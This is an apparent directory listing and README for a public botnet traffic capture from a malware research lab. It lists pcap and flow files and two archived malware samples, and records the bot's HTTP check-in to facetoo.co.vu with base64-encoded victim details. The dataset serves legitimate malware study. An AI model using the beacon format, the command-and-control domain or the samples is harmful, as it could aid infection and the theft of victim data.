Index of /publicDatasets/CTU-Malware-Capture-Botnet-133-1

[ICO]NameLast modifiedSizeDescription

[PARENTDIR]Parent Directory  -  
[   ]2015-09-09_capture-win4.biargus2015-10-15 16:33 1.4M 
[   ]2015-09-09_capture-win4.binetflow2015-10-15 16:33 844K 
[   ]2015-09-09_capture-win4.capinfos2015-09-11 11:36 761  
[   ]2015-09-09_capture-win4.dnstop2015-09-11 11:36 2.2K 
[TXT]2015-09-09_capture-win4.html2015-09-11 11:38 355K 
[   ]2015-09-09_capture-win4.json2015-09-11 11:38 3.8K 
[   ]2015-09-09_capture-win4.passivedns2015-09-11 11:36 1.9K 
[   ]2015-09-09_capture-win4.pcap2015-09-10 14:24 2.0M 
[   ]2015-09-09_capture-win4.rrd2015-09-10 14:26 8.0M 
[   ]2015-09-09_capture-win4.tcpdstat2016-12-05 22:29 1.7K 
[   ]2015-09-09_capture-win4.weblogng2016-06-15 17:43 48K 
[TXT]README.html2017-01-14 17:09 2.4K 
[TXT]README.md2015-09-11 22:08 1.9K 
[   ]TheTruthAboutYourSexualPeak,DontWorry.exe.zip2015-12-16 10:26 90K 
[   ]Tips.rar2015-09-08 09:46 84K 
[DIR]bro/2017-08-31 09:45 -  
[TXT]fast-flux-dga-first-analysis.txt2017-01-14 17:09 4.2K 

Timeline

Tue Sep 8 09:45:37 CEST 2015

Start win4

Tue Sep 8 09:50:54 CEST 2015

Executed Tips.rar, open the container and double click in the exe file.

There was also a fake error and then start working like the Details.zip file of previous capture.

URLs Requested

GET /index.php HTTP/1.1 Host: facetoo.co.vu

GET /IOS.php?Pn=V0lONCB8IEFkbWluaXN0cmF0b3I&fr=&GR=RmFjZUJvb2soSU9TKTxicj4gMjAxNS0wOC0yNA&com=IDxicj4gIDxicj4g&ID=12418116422684110102619421320747612712095&o=TWljcm9zb2Z0IFdpbmRvd3MgNyBVbHRpbWF0ZSA&ho=ZmFjZXRvby5jby52dQ==&av=&v=501P HTTP/1.1 User-Agent: 12418116422684110102619421320747612712095 Host: facetoo.co.vu

Base64decode of some parts of the URL

Thu Sep 10 14:24:47 CEST 2015

poweroff